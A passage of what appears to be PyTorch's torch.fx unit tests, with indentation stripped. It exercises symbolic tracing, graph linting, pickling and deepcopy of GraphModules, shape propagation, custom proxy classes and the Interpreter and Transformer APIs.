self.register_buffer('buffer', torch.randn(bs + 100, d_hid))
def forward(self, x):
x = torch.mm(x, self.mm_param)
skip_connection = x
x = torch.relu(x)
x = torch.mm(x, self.mm_param) + self.buffer[:x.shape[0]]
x = self.lin(x)
x = torch.relu(x)
x = x + skip_connection
x = torch.mm(x, self.mm_param2)
x = self.lin(x)
return x
ec = ExampleCode()
traced = torch.fx.symbolic_trace(ec)
x = torch.randn(bs, d_hid)
torch.testing.assert_allclose(ec(x), traced(x))
def test_node_tagging(self):
class TaggingTracer(Tracer):
def create_node(self, kind : str, target : Union[str, Callable],
args : Tuple[Argument, ...], kwargs : Dict[str, Any], name : Optional[str] = None,
type_expr : Optional[Any] = None) -> Node:
n = super().create_node(kind, target, args, kwargs, name)
n.tag = 'foo'
return n
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = TaggingTracer().trace(m)
g.lint()
for n in g.nodes:
self.assertTrue(hasattr(n, 'tag'))
self.assertEqual(n.tag, 'foo')
def test_tensor_attribute(self):
class TensorAttribute(torch.nn.Module):
def __init__(self):
super().__init__()
self.tensor = torch.rand(3, 4)
def forward(self, x):
return torch.nn.functional.linear(x, self.tensor)
ta = TensorAttribute()
traced = symbolic_trace(ta)
traced(torch.rand(4, 4))
class WrapperForQualname(torch.nn.Module):
def __init__(self):
super().__init__()
self.ta = TensorAttribute()
def forward(self, x):
return torch.nn.functional.linear(x, self.ta.tensor)
wfq = WrapperForQualname()
traced2 = symbolic_trace(wfq)
traced2.graph.lint()
traced2(torch.rand(4, 4))
def test_tensor_attribute_coalseced(self):
def count_attrs(fx_module):
targets = set()
for node in fx_module.graph.nodes:
if node.op == 'get_attr':
targets.add(node.target)
return len(targets)
val = torch.tensor(5)
def f(x):
return x + val + val
traced = symbolic_trace(f)
traced.graph.lint()
self.assertEqual(count_attrs(traced), 1)
val2 = torch.tensor(5)
def f(x):
val = torch.tensor(5)
return x + val + val2
traced = symbolic_trace(f)
traced.graph.lint()
self.assertEqual(count_attrs(traced), 2)
def test_symbolic_trace_sequential(self):
class Simple(torch.nn.Module):
def forward(self, x):
return torch.neg(x)
seq = torch.nn.Sequential(
Simple(),
Simple(),
Simple()
)
traced = symbolic_trace(seq)
traced.graph.lint()
x = torch.rand(3, 4)
self.assertEqual(traced(x), seq(x))
def test_tensor_constant(self):
class ConstTensor(torch.nn.Module):
def forward(self, x):
return torch.nn.functional.linear(x, torch.zeros(3, 4))
ct = ConstTensor()
traced = symbolic_trace(ct)
traced.graph.lint()
traced(torch.rand(4, 4))
def test_pickle_graphmodule(self):
class Nested(torch.nn.Module):
def __init__(self):
super().__init__()
self.st = torch.nn.Linear(4, 4)
def forward(self, x):
return self.st(x)
n = Nested()
traced = symbolic_trace(n)
traced.graph.lint()
pickled = pickle.dumps(traced)
loaded = pickle.loads(pickled)
loaded.graph.lint()
x = torch.rand(3, 4)
self.assertEqual(loaded(x), traced(x))
def test_pickle_custom_import(self):
graph = torch.fx.Graph()
a = graph.placeholder('x')
b = graph.placeholder('y')
c = graph.call_function(a_non_torch_leaf, (a, b))
d = graph.call_function(torch.sin, (c,))
graph.output(d)
gm = GraphModule(torch.nn.Module(), graph)
pickled = pickle.dumps(gm)
loaded = pickle.loads(pickled)
loaded.graph.lint()
x, y = torch.rand(1), torch.rand(1)
self.assertEqual(loaded(x, y), gm(x, y))
def test_all_input_nodes(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.placeholder('x')
b : torch.fx.Node = graph.call_module('linear_mod', args=(a,))
c : torch.fx.Node = graph.get_attr('y_attr')
d : torch.fx.Node = graph.call_function(operator.add, args=(b, c))
e : torch.fx.Node = graph.call_function(torch.unsqueeze, args=(d, 0))
graph.output(e)
graph.lint()
self.assertEqual(b.all_input_nodes, [a])
self.assertEqual(c.all_input_nodes, [])
self.assertEqual(d.all_input_nodes, [b, c])
self.assertEqual(e.all_input_nodes, [d])
def test_deepcopy_graphmodule_with_transform(self):
st = SimpleTest()
traced = symbolic_trace(st)
traced.graph.lint()
def transform(traced):
new_graph = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_value = new_graph.graph_copy(traced.graph, val_map)
relu_out = new_graph.create_node(
op='call_method', target='neg', args=(output_value,), kwargs={})
new_graph.output(relu_out)
return GraphModule(traced, new_graph)
transformed = transform(traced)
transformed.graph.lint()
copied = copy.deepcopy(transformed)
self.assertNotEqual(id(type(transformed)), id(type(copied)))
x = torch.randn(3, 4)
self.assertEqual(copied(x), transformed(x))
def test_deepcopy_with_submods_params(self):
class Bar(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
def forward(self, x):
return torch.relu(x) + self.param
class Baz(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.bar = Bar()
def forward(self, x):
return self.bar(x) - self.param
baz = Baz()
traced = symbolic_trace(baz)
traced.graph.lint()
copied = copy.deepcopy(traced)
copied.graph.lint()
def test_deepcopy_graph_with_tracer_cls(self):
class TestTracer(Tracer):
def is_leaf_module(self, module, name):
return True
g = Graph(tracer_cls=TestTracer)
x = g.placeholder("x")
g.output(x)
h = copy.deepcopy(g)
self.assertIsNotNone(h._tracer_cls)
self.assertTrue(g._tracer_cls == h._tracer_cls)
def test_unpack_list_better_error(self):
class SomeArgs(torch.nn.Module):
def forward(self, a, b):
return torch.rand(3, 4)
class UnpacksList(torch.nn.Module):
def __init__(self):
super().__init__()
self.sa = SomeArgs()
def forward(self, x : list):
return self.sa(*x)
ul = UnpacksList()
with self.assertRaisesRegex(TraceError, 'Proxy object cannot be iterated.'):
symbolic_trace(ul)
def test_unpack_dict_better_error(self):
class SomeKwargs(torch.nn.Module):
def forward(self, x=3, y=4):
return torch.rand(3, 4)
class UnpacksDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.sk = SomeKwargs()
def forward(self, x : dict):
return self.sk(**x)
ud = UnpacksDict()
with self.assertRaisesRegex(TraceError, 'Proxy object cannot be iterated.'):
symbolic_trace(ud)
def test_pretty_print_targets(self):
# Test that Graph pretty-print prints friendly name for targets
# in `operator` and `builtins`
class SomeMod(torch.nn.Module):
def forward(self, x):
return torch.add(x.foo + x.bar, 3.0)
traced = symbolic_trace(SomeMod())
graph_str = str(traced.graph)
self.assertIn('builtins.getattr', graph_str)
self.assertIn('operator.add', graph_str)
self.assertIn('torch.add', graph_str)
def test_pretty_print_node(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.param: torch.nn.Parameter = torch.nn.Parameter(
torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x: torch.Tensor, y: int = 2):
return self.linear(x[y] + self.param).clamp(min=0.0, max=1.0)
traced = symbolic_trace(M())
all_formatted = "\n".join([n.format_node() for n in traced.graph.nodes])
FileCheck().check("x").check("placeholder") \
.check("y").check("placeholder") \
.check("getitem").check("call_function") \
.check("param").check("get_attr") \
.check("add").check("call_function") \
.check("linear").check("call_module") \
.check("clamp").check("call_method") \
.run(all_formatted)
def test_script_tensor_constant(self):
# TorchScript seems to ignore attributes that start with `__`.
# We used to call anonymous Tensor values `__tensor_constant*`, but
# they were getting ignored by script. Now they're called
# `_tensor_constant*`
class IHaveATensorConstant(torch.nn.Module):
def forward(self, x):
return x + torch.rand(3, 4)
traced = torch.fx.symbolic_trace(IHaveATensorConstant())
torch.jit.script(traced)
def test_autowrap_functions(self):
class AutowrapFnTest(torch.nn.Module):
def forward(self, x):
return fx_int(x.shape[0] / 2)
class AutowrapFnTest2(torch.nn.Module):
def forward(self, x):
return fx_int(x.shape[0] / 2) + fx_int_x2(x.shape[0] / 2)
# Check function(s) are wrapped
# `int` would normally throw a TypeError as argument can't be `Proxy`
tracer = Tracer(autowrap_functions=(fx_int,))
graph = tracer.trace(AutowrapFnTest())
traced = GraphModule(tracer.root, graph, 'test')
tracer_2 = Tracer(autowrap_functions=(fx_int, fx_int_x2))
tracer_2.trace(AutowrapFnTest2())
# Test scriptability
traced_scripted = torch.jit.script(traced)
self.assertEqual(traced_scripted(torch.rand(4)), 2)
def test_tuple_no_subscript(self):
def foo(x : Tuple):
return x[0]
traced = torch.fx.symbolic_trace(foo)
x = (torch.randn(5, 3),)
torch.testing.assert_allclose(traced(x), x[0])
bio = io.BytesIO()
torch.save(traced, bio)
bio.seek(0)
loaded = torch.load(bio)
torch.testing.assert_allclose(loaded(x), x[0])
def test_torch_fx_len(self):
class FXLenTest(torch.nn.Module):
def forward(self, x):
return len(x)
traced = symbolic_trace(FXLenTest())
self.assertEqual(traced(torch.rand(3, 4)), 3)
# Test scriptability
scripted = torch.jit.script(FXLenTest())
self.assertEqual(scripted(torch.rand(3)), 3)
traced_scripted = torch.jit.script(traced)
self.assertEqual(traced_scripted(torch.rand(3)), 3)
# Test non-proxy len
class FXLenTest2(torch.nn.Module):
def __init__(self):
super().__init__()
self.l = [3, 4, 5]
def forward(self, x):
return x + len(self.l)
traced2 = symbolic_trace(FXLenTest2())
inp = torch.rand(3, 4)
self.assertEqual(traced2(inp), inp + 3.0)
self.assertIs(len, builtins.len)
def test_torch_fx_getattr(self):
class FXGetattrTest(torch.nn.Module):
def forward(self, x):
return getattr(x, 'nonexistent_attr', torch.Tensor([2, 3]))
traced = symbolic_trace(FXGetattrTest())
self.assertEqual(traced(torch.rand(3, 4)), torch.Tensor([2, 3]))
def test_sqrt(self):
class Sqrt1(torch.nn.Module):
def forward(self, x):
return sqrt(x.size(0))
class Sqrt2(torch.nn.Module):
def forward(self, x):
return math.sqrt(x.size(0))
class Sqrt3(torch.nn.Module):
def forward(self, x):
return x + math.sqrt(2) + sqrt(2)
self.checkGraphModule(Sqrt1(), [torch.zeros(8)])
self.checkGraphModule(Sqrt2(), [torch.zeros(8)])
self.checkGraphModule(Sqrt3(), [torch.zeros(8)])
self.assertIs(sqrt, _sqrt)
self.assertIs(math.sqrt, _sqrt)
def test_torch_custom_ops(self):
class M(torch.nn.Module):
def forward(self, a):
b = torch.ops.aten.sigmoid(a)
c = torch.ops.aten.cat([a, b])
return torch.ops.aten.cat((c, c))
m = M()
input = torch.randn(3)
ref_out = m(input)
gm = symbolic_trace(m)
gm.graph.lint()
out = gm(input)
self.assertEqual(out, ref_out)
def test_torch_op_overloads(self):
class M(torch.nn.Module):
def forward(self, a):
b = torch.ops.aten.add.Tensor(a, a)
return b
m = M()
input = torch.randn(3)
ref_out = m(input)
gm = symbolic_trace(m)
gm.graph.lint()
out = gm(input)
self.assertEqual(out, ref_out)
for node in gm.graph.nodes:
if node.op == 'call_function':
assert isinstance(node.target, torch._ops.OpOverload)
assert node.target.__name__ == 'add.Tensor'
def test_pickle_torch_custom_ops(self):
class M(torch.nn.Module):
def forward(self, a):
b = torch.ops.aten.sigmoid(a)
c = torch.ops.aten.cat([a, b])
return torch.ops.aten.cat((c, c))
m = M()
input = torch.randn(3)
ref_out = m(input)
gm = symbolic_trace(m)
gm.graph.lint()
pickled = pickle.dumps(gm)
loaded = pickle.loads(pickled)
self.assertEqual(loaded(input), gm(input))
def test_pretty_print(self):
st = SimpleTest()
traced = symbolic_trace(st)
traced.graph.lint()
printed = str(traced)
assert 'SimpleTest()' in printed
assert 'torch.relu' in printed
def test_pretty_print_graph(self):
class KwargPrintTest(torch.nn.Module):
def forward(self, x):
return torch.squeeze(x + 3.0, dim=2)
st = KwargPrintTest()
traced = symbolic_trace(st)
traced.graph.lint()
stringed = str(traced.graph)
for s in ['args', 'kwargs', '#users']:
assert s in stringed
def test_custom_proxy_type(self):
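# During tracing, x and y are Proxy objects, so x.add(y) and s.mul(x) are recorded as
# call_method nodes; the real TensorPair methods only run when the traced module is
# called with concrete TensorPair values.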
class TensorPair:
def __init__(self, left, right):
self.left, self.right = left, right
def add(self, other):
l = self.left + other.left
r = self.right + other.right
return TensorPair(l, r)
def mul(self, other):
l = self.left * other.left
r = self.right * other.right
return TensorPair(l, r)
def use_tensor_pair(x : TensorPair, y : TensorPair):
s = x.add(y)
return s.mul(x)
x = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
y = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
ref_out = use_tensor_pair(x, y)
traced = symbolic_trace(use_tensor_pair)
traced_out = traced(x, y)
self.assertEqual(traced_out.left, ref_out.left)
self.assertEqual(traced_out.right, ref_out.right)
def test_custom_proxy_type_literal(self):
class TensorPair(metaclass=torch.fx.ProxyableClassMeta):
def __init__(self, left, right):
self.left, self.right = left, right
def add(self, other):
l = self.left + other.left
r = self.right + other.right
return TensorPair(l, r)
def mul(self, other):
l = self.left * other.left
r = self.right * other.right
return TensorPair(l, r)
def use_tensor_pair_literal(x : TensorPair):
s = x.add(TensorPair(torch.zeros(5, 3), torch.zeros(5, 3)))
return s.mul(x)
x = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
ref_out = use_tensor_pair_literal(x)
traced = symbolic_trace(use_tensor_pair_literal)
traced_out = traced(x)
self.assertEqual(traced_out.left, ref_out.left)
self.assertEqual(traced_out.right, ref_out.right)
def test_custom_proxy_dynamic_value(self):
class TensorPair(metaclass=torch.fx.ProxyableClassMeta):
def __init__(self, left, right):
self.left, self.right = left, right
def add(self, other):
l = self.left + other.left
r = self.right + other.right
return TensorPair(l, r)
def mul(self, other):
l = self.left * other.left
r = self.right * other.right
return TensorPair(l, r)
def use_tensor_pair_ctor(x : TensorPair, y : torch.Tensor):
s = x.add(TensorPair(y, y))
return s.mul(x)
x = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
y = torch.randn(5, 3)
ref_out = use_tensor_pair_ctor(x, y)
traced = symbolic_trace(use_tensor_pair_ctor)
traced_out = traced(x, y)
self.assertEqual(traced_out.left, ref_out.left)
self.assertEqual(traced_out.right, ref_out.right)
def test_custom_proxy_input_dependent_control_flow(self):
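# ZeroTensor uses ProxyableClassMeta, so its construction should be recorded as a node
# during tracing rather than executed eagerly; the data-dependent branch in __init__
# then only runs at call time, with real tensors.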
class ZeroTensor(metaclass=torch.fx.ProxyableClassMeta):
def __init__(self, inp):
if inp.sum() == 0:
self.is_zero = True
self.tensor = torch.tensor([])
else:
self.is_zero = False
self.tensor = inp
def add(self, other):
if self.is_zero:
return ZeroTensor(other.tensor)
elif other.is_zero:
return self
def use_zero_tensor(x : torch.Tensor, y : torch.Tensor):
return ZeroTensor(x + y)
x, y = torch.randn(5, 3), torch.randn(5, 3)
ref_out = use_zero_tensor(x, y)
traced = symbolic_trace(use_zero_tensor)
traced_out = traced(x, y)
self.assertEqual(traced_out.is_zero, ref_out.is_zero)
self.assertEqual(traced_out.tensor, ref_out.tensor)
def test_graph_fns(self):
g = Graph()
a = g.placeholder('a')
b = g.call_module('linear', (a,))
c = g.get_attr('bias')
d = g.call_method('add', (b, c))
e = g.call_function(torch.sin, (d,))
g.output(e)
mod = torch.nn.Module()
mod.linear = torch.nn.Linear(3, 4)
mod.bias = torch.rand(4)
gm = GraphModule(mod, g)
gm.graph.lint()
input = torch.rand(3)
r = gm(input)
ref = torch.sin(mod.linear(input) + mod.bias)
self.assertEqual(r, ref)
def test_remove_uses(self):
g : torch.fx.Graph = Graph()
x : torch.fx.Node = g.placeholder('x')
relu : torch.fx.Node = g.call_function(torch.relu, (x,))
neg : torch.fx.Node = g.call_function(torch.neg, (relu,))
g.output(neg)
neg.replace_all_uses_with(relu)
g.erase_node(neg)
self.assertTrue(neg not in relu.users)
def test_remove_uses_with_custom_filter(self):
g : torch.fx.Graph = Graph()
x : torch.fx.Node = g.placeholder('x')
relu : torch.fx.Node = g.call_function(torch.relu, (x,))
neg : torch.fx.Node = g.call_function(torch.neg, (relu,))
g.output(neg)
neg.replace_all_uses_with(relu, lambda x: x != neg)
self.assertTrue(neg in relu.users)
def test_nonetype_annotation(self):
eb = torch.nn.EmbeddingBag(3, 4)
symbolic_trace(eb)
def test_pickle_nonetype_annotation(self):
eb = torch.nn.EmbeddingBag(10, 3, mode='sum')
traced = symbolic_trace(eb)
pickled = pickle.dumps(traced)
loaded = pickle.loads(pickled)
loaded.graph.lint()
input = torch.LongTensor([1, 2, 4, 5, 4, 3, 2, 9])
offsets = torch.LongTensor([0, 4])
self.assertEqual(loaded(input, offsets), traced(input, offsets))
def test_return_tuple(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:
return (x, x + x)
original = M()
traced = symbolic_trace(original)
self.assertEqual(traced(torch.ones(1)), original.forward(torch.ones(1)))
def test_construct_root_dict(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'foo.bar.baz', args=(a,))
c : torch.fx.Node = graph.create_node('get_attr', 'zip.zap.zam')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
linear_mod : torch.nn.Module = torch.nn.Linear(3, 4)
add_param : torch.Tensor = torch.rand(3, 4)
gm : torch.fx.GraphModule = torch.fx.GraphModule(
{'foo.bar.baz': linear_mod, 'zip.zap.zam' : add_param}, graph)
gm.graph.lint()
assert 'self.foo.bar.baz' in gm.code
x : torch.Tensor = torch.rand(3, 3)
out : torch.Tensor = gm(x)
ref_out : torch.Tensor = linear_mod(x) + add_param
self.assertEqual(out, ref_out)
def test_symbolic_trace_assert(self):
class AssertsTensorShape(torch.nn.Module):
def forward(self, x):
torch._assert(x.shape[1] > 4, "assert_foobar")
return x
m = AssertsTensorShape()
# verify traceability
traced = symbolic_trace(m)
# verify assertion on traced model works correctly at runtime
traced(torch.rand(4, 5))
with self.assertRaisesRegex(AssertionError, "assert_foobar"):
traced(torch.rand(4, 3))
# verify the symbolically traced module is scriptable
ms = torch.jit.script(m)
with self.assertRaisesRegex(torch.jit.Error, "assert_foobar"):
ms(torch.rand(4, 3))
def test_fx_create_arg(self):
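# __fx_create_arg__ lets a custom object describe how to turn itself into an FX
# argument; here it emits a call_function node that reconstructs CustomArgObject,
# which is why "CustomArgObject(" appears in the generated code.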
class CustomArgObject:
def __init__(self, x, y):
self.x = x
self.y = y
def __fx_create_arg__(self, tracer: torch.fx.Tracer):
return tracer.create_node(
"call_function",
CustomArgObject,
args=(
tracer.create_arg(self.x),
tracer.create_arg(self.y),
),
kwargs={},
)
class HasCustomArgObjectWhenLeaf(torch.nn.Module):
def forward(self, o: CustomArgObject):
# Not normally traceable; good reason to make
# this module a leaf.
for x in o.x:
o.y += x
return o.y
class Root(torch.nn.Module):
def __init__(self):
super().__init__()
self.inner = HasCustomArgObjectWhenLeaf()
def forward(self, x, y):
o = CustomArgObject(x, y)
return self.inner(o)
class CreateArgTracer(torch.fx.Tracer):
def is_leaf_module(self, m, module_qualified_name):
return type(m) is HasCustomArgObjectWhenLeaf
m = Root()
graph = CreateArgTracer().trace(m)
gm = torch.fx.GraphModule(m, graph)
assert "CustomArgObject(" in gm.code
def test_trace_fn_constant(self):
some_constant = torch.rand(3, 4)
def add_const(x):
return some_constant + x
traced = symbolic_trace(add_const)
input = torch.rand(3, 4)
self.assertEqual(traced(input), add_const(input))
def test_copy_no_remap(self):
traced = symbolic_trace(SimpleTest())
g = traced.graph
copied = torch.fx.Graph()
for node in g.nodes:
copied.node_copy(node)
with self.assertRaisesRegex(RuntimeError, 'does not belong to this Graph'):
copied.lint()
def test_wrong_topo(self):
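# Move the get_attr node after the add node that consumes it, so lint() should report
# a use-before-definition error.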
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'foo.bar.baz', args=(a,))
c : torch.fx.Node = graph.create_node('get_attr', 'zip.zap.zam')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
nodes = list(graph.nodes)
nodes[3].append(nodes[2])
with self.assertRaisesRegex(RuntimeError, 'was used before it has been defined'):
graph.lint()
def test_wrong_target_type(self):
graph : torch.fx.Graph = torch.fx.Graph()
with self.assertRaises(ValueError):
n = torch.fx.Node(graph=graph, name='foo', op='call_function', target='foo',
args=(), kwargs={})
def test_example_shape_prop(self):
class TestCase(torch.nn.Module):
def __init__(self):
super().__init__()
self.attr = torch.randn(3, 4)
self.submod = torch.nn.Linear(4, 4)
def forward(self, x):
return torch.neg(self.submod(x.relu() + self.attr))
tc = TestCase()
tc_traced = symbolic_trace(tc)
ref_out = tc_traced(torch.rand(3, 4))
shape_prop.ShapeProp(tc_traced).propagate(torch.rand(3, 4))
# Make sure we're testing all opcodes
opcodes = set()
output_shape : Optional[torch.Size] = None
output_stride : Optional[Tuple[int]] = None
for node in tc_traced.graph.nodes:
opcodes.add(node.op)
if node.op == 'output':
output_shape = node.args[0].meta['tensor_meta'].shape
output_stride = node.args[0].meta['tensor_meta'].stride
self.assertEqual(opcodes, set(['placeholder', 'get_attr', 'call_function', 'call_method',
'call_module', 'output']))
# Test shape propagation and make sure results match actual
self.assertEqual(output_shape, ref_out.shape)
self.assertEqual(output_stride, ref_out.stride())
def test_shape_prop_layout(self):
class ConvTest(torch.nn.Module):
def __init__(self):
super().__init__()
self.conv_mod = torch.nn.Conv2d(5, 5, 3)
def forward(self, x):
return self.conv_mod(x)
# contiguous layout
test_mod = ConvTest()
traced = symbolic_trace(test_mod)
x = torch.randn(5, 5, 224, 224)
shape_prop.ShapeProp(traced).propagate(x)
assert(all(node.meta['tensor_meta'].memory_format is torch.contiguous_format
for node in traced.graph.nodes))
x_channels_last = x.contiguous(memory_format=torch.channels_last)
traced.to(memory_format=torch.channels_last)
shape_prop.ShapeProp(traced).propagate(x_channels_last)
for node in traced.graph.nodes:
# NB: the implementation of conv may not preserve the memory format,
# unfortunately. The best we can do is just check that the placeholder
# node is channels-last
if node.op in {'placeholder'}:
self.assertEqual(node.meta['tensor_meta'].memory_format, torch.channels_last)
def test_shape_prop_aggregate(self):
class ReturnTwo(torch.nn.Module):
def forward(self, x):
return (3, torch.sum(x))
class UnderTest(torch.nn.Module):
def __init__(self):
super().__init__()
self.rt = ReturnTwo()
def forward(self, x):
return self.rt(x)
ut = UnderTest()
class RTTracer(torch.fx.Tracer):
def is_leaf_module(self, m, module_qualified_name):
return type(m) is ReturnTwo
graph = RTTracer().trace(ut)
mod = torch.fx.GraphModule(ut, graph)
shape_prop.ShapeProp(mod).propagate(torch.rand(3, 4))
for node in mod.graph.nodes:
if node.op == 'call_module':
assert 'tensor_meta' in node.meta
tensor_meta = node.meta['tensor_meta']
assert tensor_meta[0] == 3
assert tensor_meta[1].shape == torch.Size([])
def test_shape_prop_layout_3d(self):
class ConvTest3d(torch.nn.Module):
def __init__(self):
super().__init__()
self.conv_mod = torch.nn.Conv3d(5, 5, 3)
def forward(self, x):
return self.conv_mod(x)
test_mod_3d = ConvTest3d()
traced_3d = symbolic_trace(test_mod_3d)
x_3d = torch.randn(5, 5, 224, 224, 15)
shape_prop.ShapeProp(traced_3d).propagate(x_3d)
assert(all(node.meta['tensor_meta'].memory_format is torch.contiguous_format
for node in traced_3d.graph.nodes))
x_channels_last_3d = x_3d.contiguous(memory_format=torch.channels_last_3d)
traced_3d.to(memory_format=torch.channels_last_3d)
shape_prop.ShapeProp(traced_3d).propagate(x_channels_last_3d)
for node in traced_3d.graph.nodes:
# NB: the implementation of conv may not preserve the memory format,
# unfortunately. The best we can do is just check that the placeholder
# node is channels-last
if node.op in {'placeholder'}:
self.assertEqual(node.meta['tensor_meta'].memory_format, torch.channels_last_3d)
def test_interpreter(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
interpreter = Interpreter(gm)
input = torch.randn(3, 4)
self.assertEqual(interpreter.run(input), gm(input))
self.assertEqual(interpreter.run(input), m(input))
def test_interpreter_run_node_override(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
class RunNodeInterpreter(Interpreter):
def __init__(self, module):
super().__init__(module)
def run_node(self, n : Node) -> Any:
result = super().run_node(n)
n.cached_value = result
return result
input = torch.randn(3, 4)
RunNodeInterpreter(gm).run(input)
for node in gm.graph.nodes:
assert hasattr(node, 'cached_value')
def test_interpreter_onthefly_swap(self):
def fn(x):
return torch.sigmoid(x).neg()
gm = torch.fx.symbolic_trace(fn)
class NegSigmSwapInterpreter(Interpreter):
def call_function(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == torch.sigmoid:
return torch.neg(*args, **kwargs)
return super().call_function(target, args, kwargs)
def call_method(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == 'neg':
call_self, *args_tail = args
return call_self.sigmoid(*args_tail, **kwargs)
return super().call_method(target, args, kwargs)
input = torch.randn(3, 4)
result = NegSigmSwapInterpreter(gm).run(input)
self.assertEqual(result, torch.neg(input).sigmoid())
def test_interpreter_partial_eval(self):
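# Seed the Interpreter's environment with a precomputed value for the 'linear' node:
# that node is then skipped during run(), so the result is just the seeded tensor
# passed through the final clamp.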
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
gm = torch.fx.symbolic_trace(MyModule())
interp = Interpreter(gm)
env = {}
for node in gm.graph.nodes:
if node.op == 'call_module' and node.target == 'linear':
env[node] = torch.arange(0, 12, 1).reshape(3, 4) - 6.0
break
assert len(env) == 1
x = torch.randn(3, 4)
result = interp.run(x, initial_env=env)
self.assertEqual(result, (torch.arange(0, 12, 1).reshape(3, 4) - 6.0).clamp(0.0, 1.0))
def test_interpreter_star_args(self):
def with_star_args(x, *args):
return x + args[0]
gm = torch.fx.symbolic_trace(with_star_args)
interp = Interpreter(gm)
result = interp.run(torch.ones(3, 4), torch.ones(3, 4), torch.rand(3, 4))
self.assertEqual(result, torch.ones(3, 4) * 2.0)
@skipIfNoTorchVision
def test_interpreter_noop_resnet18(self):
rn18 = torchvision_models.resnet18()
transformed = torch.fx.Transformer(symbolic_trace(rn18)).transform()
inp = torch.randn(5, 3, 224, 224)
self.assertEqual(transformed(inp), rn18(inp))
@skipIfNoTorchVision
def test_interpreter_gc_values(self):
rn18 = torchvision_models.resnet18()
interp = Interpreter(symbolic_trace(rn18))
inp = torch.rand(5, 3, 224, 224)
out = interp.run(inp)
env_key_names = set(n.name for n in interp.env.keys())
self.assertEqual(env_key_names, set(['output']))
def test_interpreter_default_args(self):
class Model(torch.nn.Module):
def forward(self, x, y=3.14159):
return x + y
model = Model()
gm = torch.fx.symbolic_trace(model)
interp = Interpreter(gm)
x = torch.randn(5, 3)
out = interp.run(x)
torch.testing.assert_allclose(out, x + 3.14159)
def test_interpreter_not_enough_args(self):
class Model(torch.nn.Module):
def forward(self, x, y):
return x + y
model = Model()
gm = torch.fx.symbolic_trace(model)
interp = Interpreter(gm)
x = torch.randn(5, 3)
with self.assertRaisesRegex(RuntimeError,
'Expected positional argument for parameter y, but one was not passed in'):
out = interp.run(x)
def test_transformer_noop(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
new_gm = Transformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(new_gm(input), gm(input))
def test_transformer_op_swap(self):
def fn(x):
return torch.sigmoid(x).neg()
gm = torch.fx.symbolic_trace(fn)
class NegSigmSwapXformer(Transformer):
def call_function(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == torch.sigmoid:
return torch.neg(*args, **kwargs)
return super().call_function(target, args, kwargs)
def call_method(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == 'neg':
call_self, *args_tail = args
return call_self.sigmoid(*args_tail, **kwargs)
return super().call_method(target, args, kwargs)
transformed = NegSigmSwapXformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(transformed(input), torch.neg(input).sigmoid())
def test_transformer_multi_outputs(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
x = x + self.param
out = self.linear(x)
return x, out
m = MyModule()
gm = torch.fx.symbolic_trace(m)
new_gm = Transformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(new_gm(input), gm(input))
def test_fn_type_annotations(self):
class Foo(torch.nn.Module):
def forward(self, p : Pair, z : torch.Tensor, i : int) -> Dict[str, torch.Tensor]:
return {'a': p.x + p.y + z + i}
foo_scripted = torch.jit.script(Foo())
foo_scripted(Pair(torch.rand(5), torch.rand(5)), torch.rand(5), 3)
fxed = symbolic_trace(Foo())
fxed_scripted = torch.jit.script(fxed)
fxed_scripted(Pair(torch.rand(5), torch.rand(5)), torch.rand(5), 3)
def test_fn_type_annotation_empty(self):
def forward(a : List[torch.Tensor]):
return a[0]
torch.jit.script(symbolic_trace(forward))
def test_wrapped_method(self):
def wrap_with_relu(fn):
@functools.wraps(fn)
def wrapper(*args, **kwargs):
return torch.relu(fn(*args, **kwargs))
return wrapper
class Foo(torch.nn.Module):
@wrap_with_relu
def forward(self, x, w):
return torch.matmul(x, w)
f = Foo()
traced = symbolic_trace(f)
